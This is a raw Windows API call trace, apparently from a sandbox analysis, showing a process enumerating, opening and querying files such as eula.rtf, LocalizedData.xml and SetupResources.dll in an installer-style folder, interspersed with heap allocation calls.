[0060.877] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e378, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\eula.rtf") returned 36 [0060.877] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1038\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x109e)) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.877] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.877] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.877] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.877] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0060.878] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0060.878] AreFileApisANSI () returned 1 [0060.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml", lpUsedDefaultChar=0x0) returned 45 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.878] AreFileApisANSI () returned 1 [0060.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.878] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0060.878] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0060.879] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.879] GetFileType (hFile=0x41c) returned 0x1 [0060.879] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.879] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0060.879] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0060.879] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0060.879] CloseHandle (hObject=0x41c) returned 1 [0060.879] AreFileApisANSI () returned 1 [0060.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.879] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0060.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0060.880] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0060.880] GetFileType (hFile=0x41c) returned 0x1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.880] CloseHandle (hObject=0x41c) returned 1 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.880] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dd90 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0060.880] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dd90 | out: hHeap=0x20000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0060.881] AreFileApisANSI () returned 1 [0060.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0060.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e0d8, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml") returned 45 [0060.881] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x151aa)) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0060.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.881] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.881] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cef0 [0060.881] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0060.881] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71758 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0060.882] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0060.882] AreFileApisANSI () returned 1 [0060.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0060.882] AreFileApisANSI () returned 1 [0060.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0060.882] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0060.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0060.883] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.017] GetFileType (hFile=0x428) returned 0x1 [0061.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.018] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.018] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.018] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.018] CloseHandle (hObject=0x428) returned 1 [0061.018] AreFileApisANSI () returned 1 [0061.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71ca0 [0061.018] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0061.018] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.019] GetFileType (hFile=0x428) returned 0x1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.019] CloseHandle (hObject=0x428) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.019] AreFileApisANSI () returned 1 [0061.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0061.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1038\\SetupResources.dll") returned 46 [0061.020] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, 